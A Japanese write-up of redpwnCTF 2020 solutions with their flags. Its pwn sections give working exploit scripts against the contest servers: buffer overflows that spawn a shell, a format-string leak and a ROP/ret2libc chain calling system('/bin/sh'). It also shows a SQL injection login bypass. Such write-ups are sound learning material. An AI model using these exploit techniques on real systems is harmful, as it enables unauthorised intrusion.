redpwnCTF 2020 writeup
3199点で316位でした。まあこんなもんですね…
pwnが基本からステップアップするように作られていたので勉強になりました。
misc/sanity-check
flag: flag{54n1ty_ch3ck_f1r5t_bl00d?}
misc/discord
discordのannouncementにフラグ。
flag: flag{w3lc0me_t0_r3dpwnctf_d1sc0rd}
misc/hackerone-survey
アンケートに答える。なお私はペンテスターではない。
flag: flag{rac3_f0r_H@ck3rOne_surv3y!}
web/inspector-general
ソースコードのheadタグ内にフラグ。
flag: flag{1nspector_g3n3ral_at_w0rk}
rev/ropes
macの実行ファイル。strignsで出る。ちなみにpinは4919。
$ strings ropes Give me a magic number: First part is: flag{r0pes_ar3_ Second part is: just_l0ng_str1ngs}
flag: flag{r0pes_ar3_just_l0ng_str1ngs}
crypto/base646464
base64*25。
import base64 with open("cipher.txt", 'r') as f: s = f.read() dec = s for i in range(25): dec = base64.b64decode(dec) print(dec)
flag: flag{l00ks_l1ke_a_l0t_of_64s}
web/login
admin'/*
でログインできた。
SQL Injection Cheat Sheet | Netsparker
flag: flag{0bl1g4t0ry_5ql1}
pwn/coffer-overflow-0
#include <stdio.h> #include <string.h> int main(void) { long code = 0; char name[16]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); puts("What do you want to fill your coffer with?"); gets(name); if(code != 0) { system("/bin/sh"); } }
20h(=32)-8=24文字より多く入力するとオーバーフローしてcodeが0でなくなる。
無言でシェルが起動するので、ls
、cat flag.txt
と打つだけ。
flag: flag{b0ffer_0verf10w_3asy_as_123}
pwn/coffer-overflow-1
#include <stdio.h> #include <string.h> int main(void) { long code = 0; char name[16]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); puts("What do you want to fill your coffer with?"); gets(name); if(code == 0xcafebabe) { system("/bin/sh"); } }
オーバーフローのさせ方は前問と同じだが、codeが指定の値である必要がある。
from pwn import * io = remote('2020.redpwnc.tf', 31255) payload = b'A'*24 + p64(0xcafebabe) s = io.recvuntil('?') print(s) print(b'payload: ' + payload) io.send(payload) io.interactive()
flag: flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe}
pwn/coffer-overflow-2
#include <stdio.h> #include <string.h> int main(void) { char name[16]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); puts("What do you want to fill your coffer with?"); gets(name); } void binFunction() { system("/bin/sh"); }
returnアドレスを書き換えてbinFunctionに飛ぶようにすればよい。
$ checksec coffer-overflow-2 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) $ objdump -d coffer-overflow-2 (snip) 00000000004006e6 <binFunction>: 4006e6: 55 push %rbp 4006e7: 48 89 e5 mov %rsp,%rbp (snip)
PIEなし。オーバーフローする位置は同じなので、binFunctionのアドレス(0x4006e6)を入れるように変える。
from pwn import * io = remote('2020.redpwnc.tf', 31908) payload = b'A'*24 + p64(0x4006e6) s = io.recvuntil('?') print(s) print(b'payload: ' + payload) io.send(payload) io.interactive()
flag: flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n}
crypto/pseudo-key
情報量が落ちる系のcryptは苦手。
まずはkeyを特定するのだが、暗号化後の文字が"i"(8)だった場合、元の文字が"e"(4)か"r"(17)かわからない。
両方を見比べて、意味のある文字列になるように拾っていったところ、"redpwwwnctf"になった。
#!/usr/bin/env python3 from string import ascii_lowercase chr_to_num = {c: i for i, c in enumerate(ascii_lowercase)} num_to_chr = {i: c for i, c in enumerate(ascii_lowercase)} def encrypt(ptxt, key): ptxt = ptxt.lower() key = ''.join(key[i % len(key)] for i in range(len(ptxt))).lower() ctxt = '' for i in range(len(ptxt)): if ptxt[i] == '_': ctxt += '_' continue x = chr_to_num[ptxt[i]] y = chr_to_num[key[i]] ctxt += num_to_chr[(x + y) % 26] return ctxt ct = 'z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut' ck = 'iigesssaemk' dk = 'redpwwwnctf' # for cki in ck: # n = chr_to_num[cki] # print('' + num_to_chr[n//2] + ' or ' + num_to_chr[(n+26)//2]) m = '' for i in range(len(ct)): if ct[i] == '_': m += '_' else: n1 = chr_to_num[ct[i]] - chr_to_num[dk[i%len(dk)]] n2 = chr_to_num[ct[i]] - chr_to_num[dk[i%len(dk)]] + 26 if n1 < 0: m += num_to_chr[n2] elif 25 < n2: m += num_to_chr[n1] else: print('error') print('flag{' + m + '}')
flag: flag{i_guess_pseudo_keys_are_pseudo_secure}
pwn/secret-flag
format string bugも苦手。
$ ./secret-flag I have a secret flag, which you'll never get! What is your name, young adventurer? %p%p%p%p%p%p%p%p%p%Hello there: 0x7ffea44444700x7fafc2c459e00x7fafc29703c00x7fafc3056740(nil)0x3a4446ba00x7fafc4f7f0100x70257025702570250x70257025702570
区切りが入っていなくて見づらいけど、入力値(%p=0x2570)は8番目以降に格納されている。
flag.txtのopen、readは既に行われていて、後は格納されているbufを読み出せばよい。
buf(-28h)は入力値s(-20h)の、qw(8バイト)単位で言うと一つ前に格納されている、つまり7番目がbufのアドレス。
$ nc 2020.redpwnc.tf 31826 I have a secret flag, which you'll never get! What is your name, young adventurer? %7$s Hello there: flag{n0t_s0_s3cr3t_f1ag_n0w}
flag: flag{n0t_s0_s3cr3t_f1ag_n0w}
crypto/4k-rsa
素因数を増やしたらつよいのか?わたしにはよくわからない…。
でもfactordbで素因数分解できてしまったので。
from Crypto.Util.number import inverse, long_to_bytes n = 5028492424316659784848610571868499830635784588253436599431884204425304126574506051458282629520844349077718907065343861952658055912723193332988900049704385076586516440137002407618568563003151764276775720948938528351773075093802636408325577864234115127871390168096496816499360494036227508350983216047669122408034583867561383118909895952974973292619495653073541886055538702432092425858482003930575665792421982301721054750712657799039327522613062264704797422340254020326514065801221180376851065029216809710795296030568379075073865984532498070572310229403940699763425130520414160563102491810814915288755251220179858773367510455580835421154668619370583787024315600566549750956030977653030065606416521363336014610142446739352985652335981500656145027999377047563266566792989553932335258615049158885853966867137798471757467768769820421797075336546511982769835420524203920252434351263053140580327108189404503020910499228438500946012560331269890809392427093030932508389051070445428793625564099729529982492671019322403728879286539821165627370580739998221464217677185178817064155665872550466352067822943073454133105879256544996546945106521271564937390984619840428052621074566596529317714264401833493628083147272364024196348602285804117877 e = 65537 c = 3832859959626457027225709485375429656323178255126603075378663780948519393653566439532625900633433079271626752658882846798954519528892785678004898021308530304423348642816494504358742617536632005629162742485616912893249757928177819654147103963601401967984760746606313579479677305115496544265504651189209247851288266375913337224758155404252271964193376588771249685826128994580590505359435624950249807274946356672459398383788496965366601700031989073183091240557732312196619073008044278694422846488276936308964833729880247375177623028647353720525241938501891398515151145843765402243620785039625653437188509517271172952425644502621053148500664229099057389473617140142440892790010206026311228529465208203622927292280981837484316872937109663262395217006401614037278579063175500228717845448302693565927904414274956989419660185597039288048513697701561336476305496225188756278588808894723873597304279725821713301598203214138796642705887647813388102769640891356064278925539661743499697835930523006188666242622981619269625586780392541257657243483709067962183896469871277059132186393541650668579736405549322908665664807483683884964791989381083279779609467287234180135259393984011170607244611693425554675508988981095977187966503676074747171 p = [9353689450544968301, 9431486459129385713, 9563871376496945939, 9734621099746950389, 9736426554597289187, 10035211751896066517, 10040518276351167659, 10181432127731860643, 10207091564737615283, 10435329529687076341, 10498390163702844413, 10795203922067072869, 11172074163972443279, 11177660664692929397, 11485099149552071347, 11616532426455948319, 11964233629849590781, 11992188644420662609, 12084363952563914161, 12264277362666379411, 12284357139600907033, 12726850839407946047, 13115347801685269351, 13330028326583914849, 13447718068162387333, 13554661643603143669, 13558122110214876367, 13579057804448354623, 13716062103239551021, 13789440402687036193, 13856162412093479449, 13857614679626144761, 14296909550165083981, 14302754311314161101, 14636284106789671351, 14764546515788021591, 14893589315557698913, 15067220807972526163, 15241351646164982941, 15407706505172751449, 15524931816063806341, 15525253577632484267, 15549005882626828981, 15687871802768704433, 15720375559558820789, 15734713257994215871, 15742065469952258753, 15861836139507191959, 16136191597900016651, 16154675571631982029, 16175693991682950929, 16418126406213832189, 16568399117655835211, 16618761350345493811, 16663643217910267123, 16750888032920189263, 16796967566363355967, 16842398522466619901, 17472599467110501143, 17616950931512191043, 17825248785173311981, 18268960885156297373, 18311624754015021467, 18415126952549973977] phi = 1 for i in range(len(p)): phi = phi * (p[i]-1) d = inverse(e, phi) m = pow(c, d, n) print(long_to_bytes(m))
flag: flag{t0000_m4nyyyy_pr1m355555}
rev/bubbly
_Bool check(void) { uint32_t i; _Bool pass; i = 0; while( true ) { if (8 < i) { return true; } if (nums[i + 1] < nums[i]) break; i = i + 1; } return false; } int main(void) { uint32_t i; int unused; _Bool pass; setbuf(stdout,(char *)0x0); setbuf(stdin,(char *)0x0); setbuf(stderr,(char *)0x0); puts("I hate my data structures class! Why can\'t I just sort by hand?"); pass = false; while( true ) { __isoc99_scanf(&DAT_00102058); if (8 < i) break; nums[i] = nums[i] ^ nums[i + 1]; nums[i + 1] = nums[i + 1] ^ nums[i]; nums[i] = nums[i] ^ nums[i + 1]; pass = check(); } if (pass == false) { puts("Try again!"); } else { puts("Well done!"); print_flag(); } return 0; }
配列を繰り返しモゾモゾするような関数(言語化が難しい)はデコンパイラの方が見やすい。Ghidraで見る。
nums[i]とnum[i+1]で繰り返しxorして代入している部分は、配列num[i]とnum[i+1]の要素を入れ替えている。
用意された配列を、ぶっちゃければ手作業でバブルソートして小さい順に並べる問題。
gdb-peda$ x/10wx 0x555555558060 0x555555558060 <nums>: 0x00000001 0x0000000a 0x00000003 0x00000002 0x555555558070 <nums+16>: 0x00000005 0x00000009 0x00000008 0x00000007 0x555555558080 <nums+32>: 0x00000004 0x00000006
配列の構造体は上記のようになっている。
つまり0x1、0xa、…、0x6の配列の、入れ替える場所を0-8で指定し、小さい順に並べる。
終わったら、8より大きい値を入力して終了。
入れ替える箇所はどこからでもいいので、12345678456745645319
を入力した。
flag: flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff}
pwn/the-library
他CTFのwriteupのコードを借りただけ。
初めてROPとret2libcした。最初は一つひとつアドレス調べて書いてたんだけどpwntoolsが全部やってくれると知って驚いた。便利。
from pwn import * io = remote('2020.redpwnc.tf', 31350) elf = ELF('./true') libc = ELF('./libc.so.6') #io = process(elf.path) rop = ROP(elf) # true puts_plt = elf.plt['puts'] main = elf.symbols['main'] libc_start_main = elf.symbols['__libc_start_main'] pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0] ret = (rop.find_gadget(['ret']))[0] log.info("puts@plt: " + hex(puts_plt)) log.info("__libc_start_main: " + hex(libc_start_main)) log.info("pop rdi gadget: " + hex(pop_rdi)) base = b'A'*24 print(io.recvline()) payload = base + p64(pop_rdi) + p64(libc_start_main) + p64(puts_plt) + p64(main) io.send(payload) print(io.recvline()) print(io.recvline()) recieved = io.recvline().strip() leak = u64(recieved.ljust(8, b'\x00')) log.info("Leaked libc address, __libc_start_main: %s" % hex(leak)) libc.address = leak - libc.sym["__libc_start_main"] log.info("Address of libc %s " % hex(libc.address)) binsh = next(libc.search(b'/bin/sh')) system = libc.sym['system'] log.info("/bin/sh %s " % hex(binsh)) log.info("system %s " % hex(system)) print(io.recvline()) payload = base + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system) io.send(payload) io.interactive()
2nd payloadのret gadgetが何故必要なのかわかってない…。
flag: flag{jump_1nt0_th3_l1brary}